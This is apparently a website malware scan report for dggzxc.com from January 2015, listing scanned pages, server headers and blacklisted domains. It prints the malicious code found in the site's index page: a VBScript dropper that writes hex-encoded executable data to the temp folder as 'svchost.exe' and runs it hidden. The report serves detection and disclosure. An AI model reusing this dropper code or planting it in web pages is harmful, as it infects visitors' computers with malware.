Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dggzxc.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://dggzxc.com/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 03:30:19 GMT Accept-Ranges: bytes ETag: "bcd33538a323d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 124434 Content-Location: http://dggzxc.com/index.html Content-Type: text/html Last-Modified: Mon, 29 Dec 2014 20:08:32 GMT | clean |
http://dggzxc.com/index.html | 200 OK Content-Length: 124434 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
http://float2006.tq.cn/floatcard?adminid=8756326&sort=1 | 200 OK Content-Length: 5072 Content-Type: application/x-javascript | clean |
http://dggzxc.com/fenrui/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 03:30:25 GMT Accept-Ranges: bytes ETag: "c6187e3a4934d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142150 Content-Location: http://dggzxc.com/fenrui/index.html Content-Type: text/html Last-Modified: Tue, 20 Jan 2015 00:37:11 GMT | clean |
http://dggzxc.com/fenrui/index.html | 200 OK Content-Length: 142150 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: jhbwx.com
http://baidu.nvdei.com/js/a.js | 200 OK Content-Length: 745 Content-Type: application/x-javascript | clean |
http://dggzxc.com/about/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 03:30:29 GMT Accept-Ranges: bytes ETag: "6ab84929c82fd01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 141902 Content-Location: http://dggzxc.com/about/index.html Content-Type: text/html Last-Modified: Wed, 14 Jan 2015 07:03:12 GMT | clean |
http://dggzxc.com/about/index.html | 200 OK Content-Length: 141902 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: net138.net
http://dggzxc.com/html/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 03:30:35 GMT Accept-Ranges: bytes ETag: "6a664d4ea30d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142374 Content-Location: http://dggzxc.com/html/index.html Content-Type: text/html Last-Modified: Thu, 15 Jan 2015 17:38:04 GMT | clean |
http://dggzxc.com/html/index.html | 200 OK Content-Length: 142374 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: nxjmjz.com
http://dggzxc.com/chanpin/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 03:30:41 GMT Accept-Ranges: bytes ETag: "88e5021332d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142272 Content-Location: http://dggzxc.com/chanpin/index.html Content-Type: text/html Last-Modified: Sat, 17 Jan 2015 05:04:01 GMT | clean |
http://dggzxc.com/chanpin/index.html | 200 OK Content-Length: 142272 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: rsbwcl.com
http://dggzxc.com/news_cn/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 03:30:44 GMT Accept-Ranges: bytes ETag: "1a1029bb3233d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142797 Content-Location: http://dggzxc.com/news_cn/index.html Content-Type: text/html Last-Modified: Sun, 18 Jan 2015 15:23:37 GMT | clean |
http://dggzxc.com/news_cn/index.html | 200 OK Content-Length: 142797 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hm800.net
http://dggzxc.com/contact/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 03:30:49 GMT Accept-Ranges: bytes ETag: "d243161434d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142317 Content-Location: http://dggzxc.com/contact/index.html Content-Type: text/html Last-Modified: Mon, 19 Jan 2015 18:16:46 GMT | clean |
http://dggzxc.com/contact/index.html | 200 OK Content-Length: 142317 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: wanren88.com
http://dggzxc.com/guest/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 03:30:52 GMT Accept-Ranges: bytes ETag: "fa2e3b7bfb34d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 141329 Content-Location: http://dggzxc.com/guest/index.html Content-Type: text/html Last-Modified: Tue, 20 Jan 2015 21:53:10 GMT | clean |
http://dggzxc.com/guest/index.html | 200 OK Content-Length: 141329 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ststgd.com
http://dggzxc.com/guest/0.html | 200 OK Content-Length: 16897 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: vweilai.com
http://dggzxc.com/bmbbmw/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 03:30:56 GMT Accept-Ranges: bytes ETag: "3e363dcc1a31d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142451 Content-Location: http://dggzxc.com/bmbbmw/index.html Content-Type: text/html Last-Modified: Thu, 15 Jan 2015 23:27:15 GMT | clean |
http://dggzxc.com/bmbbmw/index.html | 200 OK Content-Length: 142451 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: xgmtjf.com
http://dggzxc.com/bmbbmw/0.html | 200 OK Content-Length: 16814 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: dgthbxg.com
http://dggzxc.com/bmbbmw/1.html | 200 OK Content-Length: 17619 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: dgthbxg.com
http://dggzxc.com/guccii/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 03:31:01 GMT Accept-Ranges: bytes ETag: "3a152e7d5132d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 141146 Content-Location: http://dggzxc.com/guccii/index.html Content-Type: text/html Last-Modified: Sat, 17 Jan 2015 12:31:16 GMT | clean |
http://dggzxc.com/guccii/index.html | 200 OK Content-Length: 141146 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ahjhaf.com
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dggzxc.com
Result:
HTTP/1.1 200 OK
Date: Sat, 31 Jan 2015 03:30:19 GMT
Accept-Ranges: bytes
ETag: "bcd33538a323d01:3c49"
Server: Microsoft-IIS/6.0
Content-Length: 124434
Content-Location: http://dggzxc.com/index.html
Content-Type: text/html
Last-Modified: Mon, 29 Dec 2014 20:08:32 GMT
...124434 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: dggzxc.com
Referer: http://www.google.com/search?q=dggzxc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.